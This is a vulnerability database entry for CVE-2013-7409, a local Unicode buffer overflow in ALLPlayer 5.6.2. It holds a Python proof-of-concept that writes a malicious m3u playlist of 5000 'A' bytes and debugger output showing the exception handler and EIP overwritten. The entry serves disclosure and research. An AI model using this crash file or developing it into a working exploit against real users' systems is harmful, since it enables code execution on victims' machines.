Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
ALLPlayer 5.6.2 Buffer Overflow
2013-10-10 / 2014-11-02
Credit:
metacom
Risk:
High
Local:
Yes
Remote:
No
CVE:
CVE-2013-7409
CWE:
CWE-119
CVSS Base Score:
7.5/10
Impact Subscore:
6.4/10
Exploitability Subscore:
10/10
Exploit range:
Remote
Attack complexity:
Low
Authentication:
No required
Confidentiality impact:
Partial
Integrity impact:
Partial
Availability impact:
Partial
Title: ALLPlayer Local Buffer Overflow PoC UNICODE Vendor: http://www.allplayer.org/download/allplayer Date found: 09.10.2013 Date published: 09.10.2013 Platform: windows 7 German Bug: Buffer Overflow UNICODE ---------------------------- 1)VERSIONS AFFECTED ---- ALLPlayer 5.6.2 2)Proof of Concept ------------------ junk = "http://" buffer="\x41" * 5000 exploit = junk + buffer try: out_file = open("ALLPlayer_Poc.m3u",'w') out_file.write(exploit) out_file.close() print "Exploit file created!" except: print "Error" 3)-(DEBUG) ---------- (1e60.1dec): Access violation - code c0000005 (!!! second chance !!!) *** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000 eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 ALLPlayer+0x10041: 00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=?? 0:000> !exchain --------------- 0012e4b0: ALLPlayer+1b7037 (005b7037) 0012e734: ALLPlayer+10041 (00410041) Invalid exception stack at 00410041 4)Credits --------- metacom Contact : metacom27 at gmail.com
References:
http://www.allplayer.org/download/allplayer
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top